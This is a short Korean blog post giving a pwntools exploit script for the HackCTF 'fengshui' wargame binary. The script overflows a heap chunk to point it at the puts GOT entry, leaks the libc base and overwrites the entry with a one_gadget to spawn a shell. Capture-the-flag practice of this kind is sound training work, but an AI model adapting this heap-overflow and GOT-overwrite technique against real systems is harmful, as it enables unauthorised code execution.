[hact ctf] 풍수지리설 분석 자료
sangjuns
·2021. 4. 16. 12:41
from pwn import *
dns,port="ctf.j0n9hyun.xyz",3028
p=remote(dns,port)
#p=process("./fengshui",env={"LD_PRELOAD":"./libc.so.6"})
e=ELF("./fengshui")
libc=ELF("./libc.so.6")
def add(des_size,name,txt_size,txt):
p.sendlineafter("Choice: ",str(0))
p.sendlineafter("Size of description: ",str(des_size))
p.sendlineafter("Name: ",name)
p.sendlineafter("Text length: ",str(txt_size))
p.sendlineafter("Text: ",txt)
def delete(idx):
p.sendlineafter("Choice: ",str(1))
p.sendlineafter("Index: ",str(idx))
def display(idx):
p.sendlineafter("Choice: ",str(2))
p.sendlineafter("Index: ",str(idx))
def update_des(idx,txt_size,txt):
p.sendlineafter("Choice: ",str(3))
p.sendlineafter("Index: ",str(idx))
p.sendlineafter("Text length: ",str(txt_size))
p.sendlineafter("Text: ",txt)
add(0x20,"AAAA",8,"AAAA")
add(0x20,"AAAA",8,"AAAA")
add(0x20,"AAAA",8,"AAAA")
delete(0)
payload="A"*0x80+p32(0x88)+p32(0x20+0x8)+"A"*0x20+p32(0)+p32(0x89)+p32(e.got['puts'])
add(0x80,"AAAA",len(payload),payload)
display(1)
p.recvuntil("Description: ")
puts_addr=u32(p.recv(4))
base=puts_addr-libc.symbols['puts']
one_gadget=base+0x3ac5c
update_des(1,4,p32(one_gadget))
p.interactive()풍수지리설.txt
0.00MB
fengshui.idb
0.16MB
익스 코드
'War Games > hack-ctf' 카테고리의 다른 글
| [hackctf] x64 Buffer Overflow (0) | 2021.04.18 |
|---|---|
| [hackctf] 내 버퍼가 흘러넘친다 (0) | 2021.04.18 |
| [hackctf] basic_fsb (0) | 2021.04.18 |
| [hackctf] bof_basic #2 (0) | 2021.04.18 |
| [hackctf] bof_basic #1 (0) | 2021.04.18 |
